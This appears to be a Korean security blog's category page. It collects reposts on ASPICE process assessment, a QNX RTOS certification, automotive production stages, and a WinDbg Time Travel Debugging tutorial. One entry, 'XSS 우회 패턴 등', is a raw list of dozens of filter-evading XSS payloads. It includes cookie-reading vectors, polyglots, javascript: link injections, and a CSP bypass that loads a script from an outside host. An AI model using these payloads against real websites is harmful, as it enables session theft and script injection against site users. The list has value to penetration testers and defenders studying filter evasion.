'경로 및 정보'에 해당되는 글 184건

ASPICE 개요

경로 및 정보 2023. 4. 3. 10:39

 

https://ji-se.tistory.com/entry/ASPICE-%EA%B0%9C%EC%9A%94

 

 

ASPICE 개요

안녕하세요. 자율주행 SW 안전 전문가를 목표로 하는 플라잉 준입니다. 오늘은 안전한 시스템 & 소프트웨어 개발의 기반이 되는 시스템 & 소프트웨어 품질 관리 (Quality Management) 측면의 프로세스

ji-se.tistory.com

 

안녕하세요. 자율주행 SW 안전 전문가를 목표로 하는 플라잉 준입니다.

 

오늘은 안전한 시스템 & 소프트웨어 개발의 기반이 되는 시스템 & 소프트웨어 품질 관리 (Quality Management) 측면의 프로세스 표준인 ASPICE 에 대해 설명하도록 하겠습니다.

 

Overview

ASPICE 는 Automotive SPICE (Software Process Improvement Capability dEtermination)의 약어로 유럽 주요 OEM이 자동차용 S/W 를 개발하는 부품 업체의 개발 프로세스의 역량을 평가하기 위한 목적으로 만든 산업계 통용 표준입니다.

 

ASPICE 의 내용은 프로세스 능력의 평가를 위한 프로세스 측정 프레임워크 표준인 ISO/IEC 33020 과 프로세스 수행능력 평가 프레임워크 표준인 ISO/IEC 15504 를 기반으로 작성 되었습니다.

 

ISO 15504 SPICE - wiki & ISO/IEC 33020
 

ISO/IEC 15504 - Wikipedia

ISO/IEC 15504 Information technology – Process assessment, also termed Software Process Improvement and Capability Determination (SPICE), is a set of technical standards documents for the computer software development process and related business managem

en.wikipedia.org

 

 

ISO/IEC 33020:2019

Information technology — Process assessment — Process measurement framework for assessment of process capability

www.iso.org

 

 

ASPICE 는 부품을 공급하는 공급업체의 개발 프로세스의 역량을 평가하고, 결과를 공식적으로 등급화하여 공급업체의 품질 능력 향상을 목적으로 활용이 되고 있습니다

 

ASPICE 는 크게 3가지로 구성이 되어 있는데, 먼저 차량 SW 개발 시 참조하여 수행할 수 있도록 제공되는 프로세스 참조 모델 (PRM, Process Reference Model) 과 공급업체의 능력을 평가하는 프로세스 평가 모델 (PAM, Process Assessment Model) 그리고 프로세스별 역량을 평가할 수 있는 측정 프레임워크 (MF, Measurement Framework (ISO/IEC 33020)) 로 구성되어 있습니다.

 

전체 개발 프로세스의 역량 수준은 측정 프레임워크에 따라 6개의 역량 수준이 존재하며 각 수준 별 내용은 다음과 같습니다.

역량 수준 설명 프로세스 속성
수준 0 :
불완전한 프로세스
(Incomplete)		 프로세스가 이행되지 않거나 프로세스 목적을 달성하지 못함 -
수준 1 :
수행된 프로세스
(Performed)		 프로세스가 수행되어 프로세스 목적을 달성 PA 1.1 프로세스 수행
(Process performance)
수준 2 :
관리된 프로세스
(Managed)		 프로세스가 계획, 감시, 조정되며 프로세스에 의해 생성된 작업 산출물이 적절하게 작성되고, 통제되고, 유지됨 PA2.1 수행 관리
(Performance management)
PA 2.2 작업 산출물 관리
(Work product management)
수준 3 :
정립된 프로세스
(Established)		 수준 2를 달성할 수 있는 정의된 프로세스가 있으며, 평가 받는 프로세스가 해당 정의된 프로세스로 수행됨 PA3.1 프로세스 정의
(Process definition)
PA3.2 프로세스 전개
(Process deployment)
수준 4 :
예측 가능한 프로세스
(Predictable)		 정립된 프로세스가 프로세스 성과를 달성하기 위해 정의된 한계 내에서 예측적으로 운영됨
즉, 프로세스 내의 여러 요소들을 정량적으로 측정 및 분석하여 이상 원인을 식별하여 해당 이상 원인을 해결		 PA4.1 정량적 분석
((Process) Quantitative analysis)
PA4.2 정량적 통제
((Process) Quantitative control
수준 5 :
혁신 프로세스
(Innovating)		 예측 가능한 프로세스가 조직차원의 정략적 피드백을 통해 전사 프로세스를 지속적으로 개선하고 실제 프로젝트를 개선된 프로젝트로 수행 PA5.1 프로세스 혁신
(Process innovation)
PA5.2 프로세스 혁신 이행
(Process innovation implementation)

 

 위에서 정리한 개발 프로세스의 역량 수준은 ASPICE 의 3가지 구성 요소인 PRM, PAM, MF 를 이용하여 결정되며 이에 대한 설명은 PRM, PAM, MF 에 대해 설명을 한 후 마지막에 설명하도록 하겠습니다. (아래 그림은 역량 수준을 결정하기 위한 PRM, PAM, MF 을 이용한 2차원 프레임워크입니다. 자세한 내용은 아래 설명하겠습니다.)

 

 

프로세스 참조 모델 (PRM, Process Reference Model)

 

ASPICE 의 프로세스 참조 모델은 위의 그림과 같이 32개의 프로세스의 집합을 제공합니다.

 

PRM에서 프로세스는 프로세스 카테고리 별로 그룹화되고 카테고리 내에서의 프로세스는 처리하는 활동 유형에 따라 프로세스 그룹으로 그룹화 됩니다.

 

프로세스 카테고리 분류는 아래과 같습니다.

  • Primary Life Cycle Processes : 제품 / 시스템 개발에 필수적인 프로세스의 그룹
  • Organizational Life Cycle Processes : 조직 차원에서 관리 및 수행이 필요한 프로세스 그룹
  • Supporting Life Cycle Processes : 다른 그룹이 원활이 수행 되도록 지원하는 프로세스 그룹

카테고리 별 프로세스 그룹은 아래과 같습니다.

Process Categories Process Group
Primary Life Cycle Processes Acquisition process group
Supply process group
System engineering process group
Software engineering process group
Organizational Life Cycle Processes Management process group
Process improvement process group
Reuse process group
Supporting Life Cycle Processes Support process group

 

PRM 각각의 프로세스는 프로세스의 명칭, 프로세스의 목표 (Purpose statement), 목표와 관련된 결과 리스트 (Process outcomes) 로 구성되어 있습니다.

 

ASPICE 에서 제공하는 PRM 의 템플릿과 작성된 PRM 은 아래와 같습니다.

 

 

VDA Scope

앞서 말씀드린바와 같이 ASPICE 는 총 32개의 프로세스로 구성이 되어 있는데, 이 중 필수/기본 범위로 VDA 에서 정한 16개의 프로세스를 VDA Scope 이라 하며, VDA scope (구, HIS Scope) 은 아래 그림의 빨간 테두리의 프로세스에 해당합니다.

 

ASPICE PRM - VDA Scope

Process Group Process
Acquisition process group ACQ.4 Supplier Monitoring
Supply process group N/A
System engineering process group
 SYS.2 System Requirement Analysis
SYS.3 System Architectural Design
SYS.4 System Integration and Integration Test
SYS.5 System Qualification Test
Software engineering process group
 SWE.1 Software Requirement Analysis
SWE.2 Software Architectural Design 
SWE.3 Software Detailed Design and Unit Construction
SWE.4 Software Unit Verification
SWE.5 Software Integration and Integration Test
SWE.6 Software Qualification Test
Management process group MAN.3 Project Management
Process improvement process group N/A
Reuse process group N/A
Support process group
 SUP.1 Quality Assurance
SUP.8 Configuration Management
SUP.9 Problem Resolution Management
SUP.10 Change Request Management

 

프로세스 평가 모델 (PAM, Process Assessment Model)

프로세스 평가 모델 (PAM, Process Assement Model) 은 프로세스 참조 모델(PRM, Process Reference Model) 의 프로세스 성과 (process outcome) 와 측정 프레임워크 (MF, Measurement Framework) 의 속성 성과 (process attribute) 가 실제 수행된 (instance 화 된) 프로세스에 존재하는지를 식벽하기 위한 지표를 제공합니다.

 

이 지표는 평가자가 실제 수행된 프로세스에 대해 역량 수준을 평가할 때 사용 됩니다.

 

프로세스 평가 모델에서 사용되는 지표는 아래 2가지가 있습니다.

  • 프로세스 수행 지표 (process performance indicator)
    • 역량 수준 1에만 적용 가능
    • PRM 의 프로세스 성과 (process outcome) 의 수행 정도를 확인 할 수 있는 지표를 제공
    • 기본 사례 (BP, Base Practice, 수행 지향적 지표), 작업 산출물 (WP, Work Product, 결과 지향적 지표) 두 가지 유형으로 구분
      • 작업 산출물의 경우, 작업 산출물 특성 (WPC, Word Procuct Caracteristic) 이 존재
  • 프로세스 능력 지표 (process capability indicator)
    • 역량 수준 2~5 에 적용
    • MF 의 프로세스 속성 성취 (process attributea acheivement) 의 달성 정도를 확인할 수 있는 지표를 제공
    • 일반 사례 (GP, Generic Practice, 수행 지향적 지표), 일반 자원 (GR, Generic Resource, 결과 지향적 지표) 

 

위의 프로세스 평가 모델에서 제공하는 지표와 프로세스의 역량 (CL, Capability Level) 간의 관계는 아래 그림과 같습니다.

 

프로세스 수행 지표 정리

앞서 정리한 대로, 프로세스 수행 지표 (process performance indicator) 는 기본 사례 (BP) 와 작업 산출물 (WP) 두 가지 유형이 존재합니다.

 

기본 사례, 작업 산출물, 작업 산출물 특성 및 프로세스 성과간의 관계

 

두 지표는 각 프로세스마다 정의되며 두 지표 모두 하나 이상의 프로세스 성과 (process outcome) 와 관련이 있으며 ASPICE 에서는 각 기본 사례 (BP), 작업 산출물 (WP) 마다 관련된 프로세스 성과 (process outcome) 을 정리합니다. (아래 예제 참조)

 

예제) SYS.2 System Requirement Analysis

예제. SYS.2 System Requirement Analysis 의 Process outcomes

예제. SYS.2 System Requirement Analysis 의 Base practices

예제. SYS.2 System Requirement Analysis 의 Work products

 

추가로, 작업 산출물 (WP)의 경우, 각 작업 산출물 (WP) 마다 작업 산출물 특성 (WPC) 이 존재하며 위의 예제에 있는 Review record 작업 산출물 (WP) 에 대한 작업 산출물 특성 (WPC) 은 아래와 같습니다.

 

위의 작업 산출물 (WP) Review record 에 대한 작업 산출물 특성 (WPC) 을 보면 해당 작업 산출물의 내용, 산출물의 구조, 형식 등이 정리된 것을 볼 수 있습니다.

 

이는 프로세스를 평가하는 심사자가 작업 산출물에 대해 평가할 때의 지표로 사용될 수도 있으며, 프로세스를 설계 및 구축하는 프로세스 조직에서 산출물 템플릿 문서 등을 만들 때 사용할 수도 있습니다.

 

ASPICE 에서는 위에서 정리한 기본 사례 (BP), 작업 산출물 (WP), 작업 산출물 특성 (WPC) 에 대해 엄격한 필수 사항도 아니며 조직을 위한 준수수항도 아니라고 설명하고 있기에, 실제 업무를 수행하는 것에 대해 생각을 해보면 위의 작업 산출물 특성 (WPC) 에 정리된 내용을 조직에 맞춰 선별하여 작업 산출물 (WP) 을 작성하는 것이 효율적일 수 있겠다 생각합니다.

 

프로세스 능력 지표 정리

앞서 정리한 대로, 프로세스 역량 지표 (process capability indicator) 는 일반 사례 (GP) 와 일반 자원 (GR) 두 가지 유형이 존재합니다.

 

일반 사례, 일반 자원, 프로세스 속성 성취 간에 관계

 

두 지표는 각 프로세스 속성 (process attribute) 마다 정의되며 모두 하나 이상의 프로세스 속성 성취 (process attribute achievement) 와 관련이 있으며 ASPICE 에서는 각 일반 사례 (GP), 일반자원 (GR) 마다 관련된 프로세스 속성 성취 (process attribute achievement) 을 정리합니다. (아래 예제 참조)

 

예제) PA 2.1 Performance management process attribute

예제. PA 2.1 Performance management process attribute 의 achievement

예제. PA 2.1 Performance management process attribute 의 Generic practices

예제. PA 2.1 Performance management process attribute 의 Generic resources

위의 예제의 상세 내용을 보면 알 수 있듯이, 프로세스 역량 지표 (process capability indicator) 의 경우, 프로세스 수행 지표 (process performance indicator) 와는 달리 전체 프로세스에 적용 할 수 있는 일반적인 형태로 작성되어 있습니다.

 

즉, 프로세스 역량 지표 (process capability indicator) 는 프로세스 참조 모델 (PRM) 에 있는 어떤 프로세스에도 적용되는 지표입니다.

 

프로세스 역량 수준 1은 프로세스 수행 지표 (process performance indicator) 에 의해서만 특정되지만, 측정 프레임워크 (Measurment Framework) 는 각 역량 수준 마다 프로세스 속성 (process attribute) 을 정의할 것을 요구합니다. 이에, ASPICE 에서는 프로세스 역량 수준 1에 대한 프로세스 속성을 프로세스 수행 지표를 달성 하는 형태로 아래와 같이 정의합니다.

프로세스 역량 수준 1의 프로세스 속성 1.1

 

'경로 및 정보' 카테고리의 다른 글

Braktooth-IVI-Report/  (0) 2023.04.14
Hackers Are Stealing Cars by Injecting Code Into Headlight Wiring  (0) 2023.04.10
ISO 26262 ASIL D 와 IEC 61508 SIL 3 인증 획득한 RTOS  (0) 2023.04.03
XSS 우회 패턴 등  (0) 2023.03.20
자동차 양산 단계  (0) 2023.03.17
블로그 이미지

wtdsoul

,

ISO 26262 ASIL D 와 IEC 61508 SIL 3 인증 획득한 RTOS

경로 및 정보 2023. 4. 3. 09:51

QNX는 1982년부터 원자력 발전소, 수술용 로봇, 산업용 로봇 및 차량과 같이 안정성 및 보안을 요구하는 임베디드 시스템을 위한 소프트웨어를 제공하고 있습니다. QNX의 소프트웨어는 1억 2천만 대 이상의 자동차에 배포되었으며 메르세데스, 아우디, BMW, 현대, KIA 등 45개 이상의 다양한 자동차 제조업체 제품에 적용되었습니다. TÜV Rheinland로부터 ISO 26262 ASIL D등급과 IEC61508 SIL3 등급의 인증을 획득한 OS를 보유하고 있어 고객은 개발할 시스템의 안전 인증을 획득하고 유지하는 비용을 최소화 할 수 있습니다.

 

MDS테크

인텔리전트 융합 솔루션 전문기업 MDS테크

www.mdstech.co.kr

 

MDS테크

인텔리전트 융합 솔루션 전문기업 MDS테크

www.mdstech.co.kr

 

MDS테크

인텔리전트 융합 솔루션 전문기업 MDS테크

www.mdstech.co.kr

 

 

제품 소개

  • QNX Neutrino RTOS는 마이크로 커널 및 모듈식 아키텍처로 구성되며, 임베디드 장비에서 동작하는 프로그램들의 실시간 처리, 안정성, 보안 등을 지원합니다.

'경로 및 정보' 카테고리의 다른 글

Hackers Are Stealing Cars by Injecting Code Into Headlight Wiring  (0) 2023.04.10
ASPICE 개요  (0) 2023.04.03
XSS 우회 패턴 등  (0) 2023.03.20
자동차 양산 단계  (0) 2023.03.17
windbg Preview  (0) 2023.03.16
블로그 이미지

wtdsoul

,

XSS 우회 패턴 등

경로 및 정보 2023. 3. 20. 17:19

XSS-Payloads/Payloads.txt at master · RenwaX23/XSS-Payloads · GitHub

 

GitHub - RenwaX23/XSS-Payloads: List of XSS Vectors/Payloads

List of XSS Vectors/Payloads . Contribute to RenwaX23/XSS-Payloads development by creating an account on GitHub.

github.com

 
  <AuDiO/**/oNLoaDStaRt='(_=/**/confirm/**/(1))'/src><!--x
   
  <mArquee onStart=[~[onmouseleave(([[(alert(1))]]))]] ]
   
  <img src="/" =_=" title="onerror='/**/prompt(1)'">
   
  <w="/x="y>"/ondblclick=`<`[confir\u006d``]>z
   
  <a/onmousemove=alert(1)//>xss
   
  https://l0.cm/xss.swf>
   
  <svg+onload=eval(location.hash.substr(1))>#alert(1)
   
  <details/open/ontoggle=confirm('XSS')>
   
  </script><svg><script>alert(1)/&apos;
   
  <svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
   
  <svg </onload ="1> (_=prompt,_(1)) "">
   
  <svg 1=""onload=alert(1)>
   
  <output name="jAvAsCriPt://&NewLine;\u0061ler&#116(1)" onclick="eval(name)">X</output>
   
  <iframe srcdoc="&lt;img src&equals;x:x onerror&equals;alert&lpar;23&rpar;&gt;" />
   
  <button onmousemove="javascript:alert(1)">xss
   
  <BoDy%0AOnpaGeshoW=+window.prompt(1)
   
  <a href=[0x0b]xss" onfocus=prompt(1) autofocus fragment="
   
  <isindex type=image src=1 onerror=alert(1)>
   
  <script>a=eval;b=alert;a(b(/ 1/.source));</script>'">
   
  <!'/!"/!\'/\"/--!><Input/Type=Text AutoFocus */; OnFocus=(confirm)(1) //>
   
  <style><img src="</style><img src=x "><object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
   
  jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
   
  <embed src=/x//alert(1)><base href="javascript:\
   
  \u003csvg/onload=alert`1`\u003e
   
  \<svg/onload=alert`1`\>
   
  <article xmlns ="urn:img src=x onerror=xss()//" >xss
   
  i\{\<\/\s\t\y\le\>\<\i\m\g\20\o\ne\r\r\o\r\=\'a\le\r\t\(d\oc\u\me\nt\.c\o\o\kie\)\'\s\rc\=\'eeeeeee\'\20\>{
   
  <img / src = \ 'dfdfd \' // onerror = \ 'alert (document.cookie) \ '>
   
  <img/src=q onerror='new Function`al\ert\`OPENBUGBOUNTY\``'>
   
  <Html Onmouseover=(alert)(1) //
   
  <a href="javascript&colon;alert&lpar;document&period;domain&rpar;">Click Here</a>
   
  <script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>
   
  <scr<!--esi-->ipt>aler<!--esi-->t(1)</sc<!--esi-->ript>
   
  &#x003c;img src=1 onerror=confirm(1)&#x003e;
   
  %26%23x003c%3Bimg%20src%3D1%20onerror%3Dalert(1)%26%23x003e%3B%0A
   
  x%22%3E%3Cimg%20src=%22x%22%3E%3C!--%2522%2527--%253E%253CSvg%2520O%256ELoad%253Dconfirm%2528/xss/%2529%253E
   
  <embed src=/x//alert(1)><base href="javascript:\
   
  <x+oncut=y=prompt,y`1`>xss
   
  <svG x=">" onload=(co\u006efirm)``>
   
  <script/xss~~~>;alert(1);</script/X~~~>
   
  <VideO/**/OnerroR=~alert("1")+/SrC>
   
  <video/poster/onerror=prompt(1)>
   
  <sVG/xss/OnLoaD+="window['confirm']+(1)">
   
  <img x/src=x /onerror="x-\u0063onfirm(1)">
   
  <VidEo/oNLoaDStaRt=confirm(1)+/src>
   
  <video/src=//w3schools.com/tags/movie.mp4%0Aautoplay/onplay=(confirm(1))>
   
  <p/%0Aonmouseover%0A=%0Aconfirm(1)>xss
   
  <span/onmouseover=confirm(1)>xss
   
  <iframe/name="javascript:confirm(1);"onload="while(1){eval(name);}">
   
  <svg/onload=window.onerror=alert;throw/XSS/;//
   
  <object data='data:text/html;base64,PFNDUklQVD5hbGVydCgnUkVOV0FYMjMnKTs8L1NDUklQVD4=' /src>
   
  <InpuT/**/onfocus=pr\u006fmpt(1)%0Aautofocus>xss
   
  <img src="x:alert" onerror="eval(src%2b'(1)')">
   
  <img/src=xss%0A/**/onerror=eval('al'%2b'ert(1)')>
   
  <img/alt=1 onerror=eval(src) src=x:alert(alt) >
   
  <isindex/**/alt=1+src=xss:window['alert']/**/(alt)+type=image+onerror=while(true){eval(src)}>
   
  <input type="text" name="foo" value=""autofocus/onfocus=alert(1)//">
   
  <math href="javascript:alert(1)">CLICKME
   
  <var onmouseover="prompt(1)">xss</var>
   
  <h1/onmouseover='alert(1)'>xss
   
  <object data="javascript:alert(1)">
   
  <--'<script>window.confirm(1)</script> --!>
   
  <div onmouseover=prompt("1")>xss
   
  <img src=x onerror=window.open('data:text/html;base64,PFNDUklQVD5hbGVydCgnUkVOV0FYMjMnKTs8L1NDUklQVD4=');>
   
  <plaintext/onmousemove=prompt(1)>xss
   
  <marquee/onstart=alert(1)>xss
   
  <embed src=javascript:alert(1)>
   
  <select autofocus onfocus=alert(1)>
   
  <textarea autofocus onfocus=alert(1)>
   
  <keygen autofocus onfocus=alert(1)>
   
  <div/onmouseover='alert(1)'>xss
   
  https://google.com'>
   
  <audio src=x onerror=confirm("1")>
   
  <iframe src="data:text/html;base64,PFNDUklQVD5hbGVydCgnUkVOV0FYMjMnKTs8L1NDUklQVD4="/>
   
  <img%09onerror=alert(1) src=a>
   
  <i onclick=alert(1)>Click here</i>
   
  <img src=<b onerror=alert('xss');>
   
  <img src="x:? title=" onerror=alert(1)//">
   
  <img src="x:gif" onerror="eval('al'%2b'ert(/xss/)')">
   
  <img src="x:gif" onerror="window['al\u0065rt'] (/'xss'/)"></img>
   
  <a onmouseover%3D"alert(1)">xss
   
  <script/%00%00v%00%00>alert(/xss/)</script>
   
  <svg/onload=document.location.href='data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4='>
   
  <script>$=1,alert($)</script>
   
  <svg•onload=alert(1)>
   
  <h1/onmouseover='alert(1)'>xss
   
  <video onerror=alert(1337) </poster>
   
  <input onfocus=alert(1337) </autofocus>
   
   
  CSP BYPASS:
   
  <script>f=document.createElement("iframe");f.id="pwn";f.src="/robots.txt";f.onload=()=>{x=document.createElement('script');x.src='//bo0om.ru/csp.js';pwn.contentWindow.document.body.appendChild(x)};document.body.appendChild(f);</script>
   
   
  POLYGLOT:
   
  javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
   
   
  HYPERLINK TAG INJECTION:
   
  javascript:alert(1)
   
  javascript://%250Aalert(document.location="https://google.com",document.location="https://www.facebook.com")
   
  javascript://%250Aalert(document.cookie)
   
  javascripT://https://google.com%0aalert(1);//https://google.com
   
  /x:1/:///%01javascript:alert(document.cookie)/
   
   
  INLINE HTML INJECTION WITHOUT TAG BREAK:
   
  " onclick=alert(1)//">click
   
  " autofocus onfocus=alert(1) "
   
  " onfocus=prompt(1) autofocus fragment="
   
  " onmouseover="confirm(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"
   
   
  JAVASCRIPT INJECTION:
   
  '?prompt`1`?'
   
  "])},alert(1));(function xss() {//
   
  ""});});});alert(1);$('a').each(function(i){$(this).click(function(event){x({y
   
  "}]}';alert(1);{{'
   
  11111';\u006F\u006E\u0065rror=\u0063onfirm; throw'1
   
  \');confirm(1);//
   
  x");$=alert, $(1);//
   
  '|alert(1)|'
   
  '*prompt(1)*'
   
  "; ||confirm('XSS') || "
   
  "-alert(1)-"
   
  \'-alert(1)};{//
   
  "'-alert(1)-'"
   
  \u0027-confirm`1`-\u0027
   
  '}};alert(1);{{'

'경로 및 정보' 카테고리의 다른 글

ASPICE 개요  (0) 2023.04.03
ISO 26262 ASIL D 와 IEC 61508 SIL 3 인증 획득한 RTOS  (0) 2023.04.03
자동차 양산 단계  (0) 2023.03.17
windbg Preview  (0) 2023.03.16
Vehicel nist  (0) 2023.03.16
블로그 이미지

wtdsoul

,

자동차 양산 단계

경로 및 정보 2023. 3. 17. 14:19

[2019.08.06] 자동차 신차 개발 단계 (tistory.com)

 

[2019.08.06] 자동차 신차 개발 단계

사실 이렇게 디테일하게 알 필요는 없겠으나 관련 업종에 있는 분은 알 필요가 있는 내용입니다. P1이 마무리가 되었네, 초도양산 시점이 언제네 등 용어를 알아야 대화를 하기에..... 자동차 신

since2018.tistory.com

 

사실 이렇게 디테일하게 알 필요는 없겠으나

관련 업종에 있는 분은 알 필요가 있는 내용입니다.

 

P1이 마무리가 되었네, 초도양산 시점이 언제네 등 용어를 알아야 대화를 하기에.....

 

자동차 신차 개발 단계 (24 Month)


1단계 Model Fix
2단계 [시작차] Proto(원시적) - 내구/법규확인 (No 생산라인으로 차량제작) | FA1, FA2
3단계 [용도차] Pilot(시험적) - 품질/설비능력확인 | 연구소(P1, P2) , 공장(T1,T2)
4단계 [선행양산] MP (Manufacture Production) - 양산성최종확인 | M1, M2
5단계 [초도양산] SOP (Start Of Production) - 신차 양산

 

단계별 순서

 

단계별 상세

 

'경로 및 정보' 카테고리의 다른 글

ISO 26262 ASIL D 와 IEC 61508 SIL 3 인증 획득한 RTOS  (0) 2023.04.03
XSS 우회 패턴 등  (0) 2023.03.20
windbg Preview  (0) 2023.03.16
Vehicel nist  (0) 2023.03.16
향후 자동차 사이버보안 강화를 위해서는  (1) 2023.03.14
블로그 이미지

wtdsoul

,

windbg Preview

경로 및 정보 2023. 3. 16. 18:46

[Research] 시간을 여행하는 해커를 위한 안내서 Part1 - hackyboiz

 

hackyboiz

hack & life

hackyboiz.github.io

머릿말

Time Travel Debugging(TTD)는 2017년에 공개된 Windbg preview의 기능입니다. 공개된 지 3년이나 지났지만 아직 한글로 된 자세한 문서는 별로 없는 거 같더라고요. windbg preview를 쓴다거나 TTD의 존재를 아는 사람이 적어서 그런가 싶기도 하고… windbg로 디버깅을 처음 해본다거나 디버깅 자체를 처음 시작하려는 사람들에겐 한글로 된 문서가 문턱의 높이를 낮추는데 큰 도움이 된다고 생각합니다.

그래서 “내가 만들어 보지 뭐”라는 생각으로 직접 공부해보면서 작성해볼까 합니다.

대략 Part 3까지 생각 중이고, Part 4까지 추가로 할 수도 있어요.

  • Part 1 : 간단 소개 및 첫인상
  • Part 2 : 구버전의 open source에서 발생하는 버그를 직접 분석해보는 실습
  • Part 3 : 크래쉬 분석에 사용해본 경험담
  • Part 4 : JavaScript를 이용한 자동화 및 고오오급 사용법

Time Travel Debugging

불현듯이 과거에 저지른 실수 때문에 이불 킥을 하고 싶은 경험을 누구나 한 번쯤은 해봤을겁니다. 과거로 돌아가 모두 없던 일로 만들 수만 있다면 얼마나 좋을까요. 물론 그게 불가능하다는 사실이 더욱 가슴을 후벼 파며 사람을 미치게 만듭니다. 하지만 Microsoft의 Debugging Experience팀은 Debugging의 한에선 과거로 돌아가 저지른 실수를 만회할 수 있게 해 줍니다.

Time Travel Debugging(TTD), is a tool that allows you to record an execution of your process running, then replay it later both forwards and backwards.

TTD는 프로세스의 실행을 “되감기(rewind)”할 수 있기 때문에 매번 버그를 재 구현하는 번거로움을 덜고 디버깅할 수 있습니다. 게다가 MS 스토어에서 windbg preview를 설치하는 것만으로 TTD를 사용할 수 있다니…

아니아니 무료라구요 손님

기본적인 사용법

관리자 권한으로 실행

디버깅 타겟의 실행을 녹화해 만들어진 Trace file(이하 .run)을 씹고 뜯고 맛보고 즐긴다는 게 TTD의 매력입니다. 그전에 우선 windbg preview를 관리자 권한으로 실행하셔야 합니다. Input/Output 트레이싱을 기록하는 디버깅 방식은 이미 존재해왔지만 TTD는 이보다 좀 더 확장된 개념으로, 프로세스의 모든 실행을 기록해 .run을 만들기 때문에 상대적으로 높은 권한을 요구합니다.

Trace file 녹화하기

[상단 메뉴] > [파일] > [Launch executable (advanced)] > 실행 파일 선택 > [Record with TTD 체크 박스]

디버깅 타겟이 될 실행 파일을 선택해준 뒤 Record with Time Trabel Debugging를 체크해주시면 됩니다.

기본적으로 .run파일은 C:\\Users\\username\\Documents에 만들어집니다. 원하신다면 생성 경로를 바꾸실 수 있습니다. .run파일의 경로를 지정 후 Record 버튼을 누르시면 프로세스의 녹화가 시작됩니다.

타겟의 녹화가 진행되고 있음을 알려주는 팝업창이 뜬다면 정상적으로 녹화되고 있다는 뜻입니다. 이 팝업창에선 타겟 프로세스, 녹화 커멘드를 보여주며 이 녹화가 진정 내가 원하는 녹화가 맞는지 최종 확인하시면 됩니다.

물론 이 팝업창이 뜬다면 그런 건 신경 쓰지 마시고 최대한 빨리 디버깅하고자 하는 이슈나 버그를 재현해주셔야 합니다. 나중에 잠시 다룰 단점의 내용이지만 간단히 설명드리자면 .run파일이 크기가 생각보다 빨리 커집니다. 이 글을 쓰기 위해 재현하는데 대략 3~4초 정도 걸리는 크래쉬를 녹화했고 1.5GB 크기의 .run파일이 만들어졌습니다. 평균적으로 영화 한 편이 1.5GB입니다. 거기다 추가로 .idx라는 파일이 0.5GB를 차지하니 총 2GB나 사용하는군요. MSDOCS에 따르면 .idx파일은 보통 .run파일의 2배 정도의 크기가 된다고 합니다.

앞으로 이 .run파일만 있다면 디버깅을 하다가 다시 버그를 재현하는 번거로움을 없앨 수 있습니다. 보통 디버깅하다 실수한다거나 컨트롤이 버그 발생시점을 넘어가버리면 restart기능을 사용해 프로세스의 시작 시점으로 돌아가야 합니다. 간혹 restart기능이 안 먹거나 디버거 자체를 재시작해야 하는 경우엔 버그를 또다시 재현해야 해서 상당히 귀찮죠. 저는 이런 경우에 vm의 스냅샷을 이용하거나 .bat파일을 사용해 버그 재현을 자동화 하곤 했습니다. 우웩…

TTD 쓰세요, 두번 쓰세요

지금까지 간단하게 TTD를 사용해본 제가 생각하는 장점, 그리고 MS에서 내세우고 있는 장점을 알아봅시다.

Re:zero부터 시작하는 디버깅? 우웩

아까 말씀드린 대로 디버깅하면서 프로세스의 시작 시점으로 돌아가는 일은 정말 빈번히 발생합니다. 이래서 우리 idioth형이 리버싱을 좋아하나 봐요. ㅋㅋㅋㅋ

디버거 종류와 상관없이 조금 만져봤다 하시는 분들은 위 사진에서 각각 기능들이 무슨 동작을 하는지 익숙할 겁니다.

  1. GO : break point 위치까지 프로그램을 실행
  2. Step Out : 현재 함수를 끝까지 실행 후 리턴
  3. Step Into : instruction 한개 실행, 만약 함수를 호출하면 함수 내부로 진입
  4. Step Over : instruction 한개 실행, 만약 함수를 호출하면 해당 함수를 끝까지 실행후 리턴

GO를 진행하기 전에 break point 설정을 잘못했다거나, Step Into를 사용해 함수 내부로 진입해야 하는 상황에서 Step Over를 하게 될 경우 눈물을 머금고 restart버튼을 눌러야 하죠. 정말 잠시 집중을 안 하면 벌어지는 일이라 짜증 나기도 하고 break point의 한계를 생각해보면 여간 귀찮은 게 아닙니다. TTD는 이런 불편함을 어떻게 해결했을까요?

Reverse Flow Control

TTD는 위에서 설명한 Flow Control 기능을 뒤집은 Reverse Flow Control을 제공합니다. 그냥 말 그대로 프로그램의 흐름을 거꾸로 거슬러 올러갈 수 있다는 뜻입니다. 아까 말한 대로 Step Into를 해야 할 상황에서 Step Over를 해버려서 분석해야 할 함수에 진입하지 못했다면 단순히 Step Over Back 하면 해결됩니다.

Time Travel Position

그럼 단순히 현재 program counter 위치로부터 intruction을 거슬러 올라가는 게 끝이냐? 그랬다면 시간여행(Time Travel)이란 이름이 붙진 않았겠죠. 녹화 시작부터 녹화 종료 시점까지 실행된 instruction마다 Time Travel Position(이하 TTP)이란 값이 매겨지는데 break point의 상위 호환이라 생각하시면 됩니다.

예를 들어 fabulous()라는 함수가 있고 이 함수가 16번째 호출된 시점에서 함수 내부에 버그가 발생했다고 가정해 봅시다. 동적 디버깅을 위해 fabulous()함수 엔트리에 break point를 걸었다면 프로세스의 시작 시점부터 버그 발생 위치까지 해당 break point에 총 16번 걸려야 합니다.

반면 Time Travel Position은 같은 함수의 같은 instruction일지라도 실행 시점이 다르다면 다른 값이 매겨집니다. !tt명령어를 사용해 임의의 TTP로 이동할 수 있으며 프로세스의 상태를 특정 시점으로 되돌릴 수 있습니다.

Timeline

